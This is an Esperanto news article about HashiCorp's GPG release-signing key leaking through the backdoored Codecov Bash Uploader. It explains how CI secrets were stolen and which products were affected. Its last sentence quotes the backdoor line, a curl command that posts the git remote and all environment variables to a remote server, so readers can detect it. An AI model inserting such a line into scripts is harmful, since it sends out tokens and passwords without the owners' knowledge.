HashiCorp, konata pro evoluigado de la malfermfontaj iloj Vagrant, Packer, Nomad kaj Terraform, anoncis la likon de la privata GPG-ŝlosilo uzata por krei ciferecajn subskribojn, kiuj kontrolas eldonojn. Atakantoj, kiuj akiris aliron al la GPG-ŝlosilo, povus eble fari kaŝitajn ŝanĝojn al HashiCorp-produktoj kontrolante ilin per ĝusta cifereca subskribo. Samtempe, la firmao deklaris, ke dum la revizio, neniuj spuroj de provoj fari tiajn modifojn estis identigitaj.
Nuntempe, la kompromitita GPG-ŝlosilo estis revokita kaj nova ŝlosilo estis enkondukita anstataŭe. La problemo influis nur konfirmon uzante la SHA256SUM kaj SHA256SUM.sig dosierojn, kaj ne influis la generacion de ciferecaj subskriboj por Linukso DEB kaj RPM-pakaĵoj liveritaj per releases.hashicorp.com, same kiel eldonajn konfirmmekanismojn por macOS kaj Vindozo (AuthentiCode) .
La liko okazis pro la uzo de la Codecov Bash Uploader (codecov-bash) skripto en la infrastrukturo, dizajnita por elŝuti priraportajn raportojn de kontinuaj integrigaj sistemoj. Dum la atako kontraŭ la kompanio Codecov, malantaŭa pordo estis kaŝita en la specifita skripto, per kiu pasvortoj kaj ĉifradaj ŝlosiloj estis senditaj al la servilo de la atakantoj.
Por haki, la atakantoj profitis eraron en la procezo de kreado de la bildo Codecov Docker, kiu permesis al ili ĉerpi alirdatumojn al GCS (Google Cloud Storage), necesajn por fari ŝanĝojn al la skripto de Bash Uploader distribuita de la codecov.io. retejo. La ŝanĝoj estis faritaj reen la 31-an de januaro, restis nerimarkitaj dum du monatoj kaj permesis al atakantoj ĉerpi informojn konservitajn en klienta daŭra integriga sistema medio. Uzante la aldonitan malican kodon, atakantoj povus akiri informojn pri la provita Git-deponejo kaj ĉiuj mediovariabloj, inkluzive de ĵetonoj, ĉifradaj ŝlosiloj kaj pasvortoj transdonitaj al kontinuaj integrigaj sistemoj por organizi aliron al aplika kodo, deponejoj kaj servoj kiel Amazon Web Services kaj GitHub.
Krom la rekta alvoko, la skripto de Codecov Bash Uploader estis uzata kiel parto de aliaj alŝutantoj, kiel Codecov-action (Github), Codecov-circleci-orb kaj Codecov-bitrise-step, kies uzantoj ankaŭ estas tuŝitaj de la problemo. Ĉiuj uzantoj de codecov-bash kaj rilataj produktoj rekomendas revizii siajn infrastrukturojn, kaj ankaŭ ŝanĝi pasvortojn kaj ĉifrajn ŝlosilojn. Vi povas kontroli la ĉeeston de malantaŭa pordo en skripto per la ĉeesto de la linio curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || vera
fonto: opennet.ru